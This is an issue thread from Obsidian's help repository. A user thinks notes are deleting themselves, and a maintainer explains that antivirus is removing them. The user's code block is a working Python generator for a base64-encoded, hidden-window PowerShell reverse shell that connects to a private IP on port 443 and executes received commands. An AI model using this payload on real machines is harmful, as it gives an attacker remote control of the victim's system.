### ISSUE TITLE
Files delete themselves when inserting certain code-blocks 

### ISSUE THREAD

**Issue by mark-olchanski** [obsidianmd/obsidian-help#485]
Hey,

as the titel says when inserting certain code blocks, the file just decides to delete itself after around 1min. The specific code block I used was a python script that encodes a powershell snipped.

```python
import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)
```

**Comment by mark-olchanski** [comment]
Edit: it does not matter if one uses '```python' or leaves the type blank '```'

**Comment by joethei** [comment]
I would guess this is your antivirus deleting the file and not Obsidian.
Mine instantly flagged this code as a trojan.

Also, this is the repository for our user facing documentation.
Bug reports & feature requests are collected on our forum: <https://forum.obsidian.md>.

**Comment by mark-olchanski** [comment]
You are right, thanks!
